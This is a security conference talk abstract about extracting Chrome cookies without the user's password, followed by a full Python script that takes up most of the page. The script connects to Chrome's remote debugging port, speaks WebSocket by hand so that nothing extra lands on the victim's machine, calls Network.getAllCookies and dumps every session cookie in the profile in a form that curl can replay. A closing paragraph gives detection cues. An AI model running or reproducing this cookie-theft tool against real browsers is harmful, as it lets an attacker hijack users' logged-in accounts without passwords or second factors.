Stealing Chrome cookies without a password

Thursday 09:15-09:45

About “Alex”

“Alex” (@mangopdf) does Red Teaming, recently completed Operation ACTUAL CRIMES, and can’t wait until they’re inevitably struck down by their own hubris.

They’re known for hacking a friend (with consent!) in Operation Luigi, being an organiser for (a defensive, inclusive, pastel-purple security conference) and for writing dumb blog posts on

They discovered that by combining “NAND” and “AND” logic gates they could make a new “N” logic gate that performs nothing this isn’t true i just get to write whatever i want here

Talk Overview

If you steal someone’s Chrome cookies, you can use their sessions on every website they’re logged in to: the cookie is the proof of login, so no password or second factor is asked for again.

Normally you need the user’s password to do it, because Chrome encrypts its cookie store with a key kept in the OS keychain, and on a Mac reading that key out of the keychain prompts for the login password. I found a way to do it without the password: you just need to be able to execute code on their computer. It works by using Chrome’s remote debugging interface (the DevTools Protocol) to ask the running browser for the cookies it has already decrypted. To my knowledge this is the only way to extract a user’s Chrome cookies without their password, and by far the easiest way.

It involves plugging together several extremely forbidden and undocumented Chrome features, as well as figuring out how to speak the WebSocket protocol stealthily on a victim’s machine.
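The remote-debugging path the abstract describes, as an added example that is not the speaker’s code or tooling: a minimal DevTools Protocol client in Python that does the WebSocket handshake and framing by hand (RFC 6455), so nothing outside the standard library has to land on the host, and then sends Network.getAllCookies to a page target. It assumes Chrome is already running with --remote-debugging-port=9222 on 127.0.0.1; the host, port and SAMPLE_RESPONSE are assumptions constructed for illustration, and none of the talk’s undisclosed “forbidden features” or stealth tricks are reproduced here.

```python
# Added example, not the speaker's code: a minimal Chrome DevTools Protocol client that
# speaks WebSocket by hand (RFC 6455) and asks a running Chrome for every cookie via
# Network.getAllCookies. Assumes Chrome was launched with --remote-debugging-port=9222;
# host, port and the sample reply below are constructed for illustration.
import base64
import hashlib
import json
import os
import socket
import struct
from urllib.parse import urlparse
from urllib.request import urlopen

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed by RFC 6455

# Constructed stand-in for a Network.getAllCookies reply so the parsing can run offline.
SAMPLE_RESPONSE = json.dumps({"id": 1, "result": {"cookies": [
    {"name": "sid", "value": "abc", "domain": ".example.com", "path": "/",
     "expires": 1700000000, "secure": True, "httpOnly": True},
    {"name": "prefs", "value": "dark", "domain": "example.com", "path": "/",
     "expires": -1, "secure": False, "httpOnly": False}]}})


def cdp_request(msg_id, method, params=None):
    """Serialise one DevTools Protocol command; Chrome answers with the same id."""
    return json.dumps({"id": msg_id, "method": method, "params": params or {}})


def ws_accept_key(client_key):
    """Sec-WebSocket-Accept value the server must return for a given Sec-WebSocket-Key."""
    return base64.b64encode(hashlib.sha1((client_key + WS_GUID).encode()).digest()).decode()


def encode_frame(payload, opcode=0x1, mask_key=None):
    """One FIN frame, client to server, hence masked. Commands are short (< 64 KiB)."""
    mask_key = mask_key or os.urandom(4)
    n = len(payload)
    head = bytes([0x80 | opcode]) + (bytes([0x80 | n]) if n < 126
                                     else bytes([0x80 | 126]) + struct.pack(">H", n))
    return head + mask_key + bytes(b ^ mask_key[i % 4] for i, b in enumerate(payload))


def decode_frame(buf):
    """Parse one frame; returns (opcode, payload, bytes_consumed) or None if incomplete."""
    if len(buf) < 2:
        return None
    opcode, masked, n = buf[0] & 0x0F, buf[1] & 0x80, buf[1] & 0x7F
    ext = {126: 2, 127: 8}.get(n, 0)  # extended length field, if any
    if len(buf) < 2 + ext:
        return None
    if ext:
        n = int.from_bytes(buf[2:2 + ext], "big")
    pos = 2 + ext + (4 if masked else 0)  # server frames are unmasked; tolerate both
    if len(buf) < pos + n:
        return None
    payload = buf[pos:pos + n]
    if masked:
        key = buf[pos - 4:pos]
        payload = bytes(b ^ key[i % 4] for i, b in enumerate(payload))
    return opcode, payload, pos + n


def cookies_from_response(raw):
    """Extract the cookie list from a Network.getAllCookies reply, surfacing CDP errors."""
    msg = json.loads(raw)
    if "error" in msg:
        raise RuntimeError(msg["error"])
    return msg["result"]["cookies"]


def to_netscape(cookies):
    """Render cookies in Netscape cookies.txt form, which curl -b and wget accept."""
    lines = ["# Netscape HTTP Cookie File"]
    for c in cookies:
        exp = c.get("expires", -1)  # CDP uses -1 for session cookies
        lines.append("\t".join([c["domain"], "TRUE" if c["domain"].startswith(".") else "FALSE",
                                c["path"], "TRUE" if c.get("secure") else "FALSE",
                                str(int(exp)) if exp > 0 else "0", c["name"], c["value"]]))
    return "\n".join(lines) + "\n"


def _recv(sock, buf):
    chunk = sock.recv(1 << 16)
    if not chunk:
        raise ConnectionError("Chrome closed the debugging connection")
    return buf + chunk


def dump_cookies(host="127.0.0.1", port=9222):
    """Pull every cookie out of a live Chrome listening on the remote debugging port."""
    # The HTTP side of the port lists debug targets; any page target serves Network.* commands.
    pages = [t for t in json.load(urlopen(f"http://{host}:{port}/json")) if t.get("type") == "page"]
    if not pages:
        raise RuntimeError("no page target found; the browser needs at least one tab open")
    key = base64.b64encode(os.urandom(16)).decode()
    sock = socket.create_connection((host, port))
    sock.sendall((f"GET {urlparse(pages[0]['webSocketDebuggerUrl']).path} HTTP/1.1\r\n"
                  f"Host: {host}:{port}\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
                  f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n").encode())
    buf = b""
    while b"\r\n\r\n" not in buf:
        buf = _recv(sock, buf)
    head, buf = buf.split(b"\r\n\r\n", 1)
    if ws_accept_key(key).encode() not in head:
        raise ConnectionError("WebSocket upgrade refused: " + head.split(b"\r\n")[0].decode())
    sock.sendall(encode_frame(cdp_request(1, "Network.getAllCookies").encode()))
    while True:  # the reply may span several TCP reads; reassemble one frame at a time
        frame = decode_frame(buf)
        if frame is None:
            buf = _recv(sock, buf)
            continue
        opcode, payload, used = frame
        buf = buf[used:]
        if opcode == 0x1:  # text frame; no events were subscribed, so this is our reply
            return cookies_from_response(payload.decode())


if __name__ == "__main__":
    print(to_netscape(dump_cookies()), end="")
```

Run against a debugging-enabled Chrome it prints a cookies.txt that `curl -b` can replay; Network.getAllCookies returns every cookie in the profile, not just the current tab’s, which is why a single command is enough. On the defensive side, the same facts are the detection: a chrome process with --remote-debugging-port on its command line, or a new listener on the loopback interface owned by the browser, is not something a user produces by accident.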

This talk is about how the technique was found, how it works, and what you can do with it.

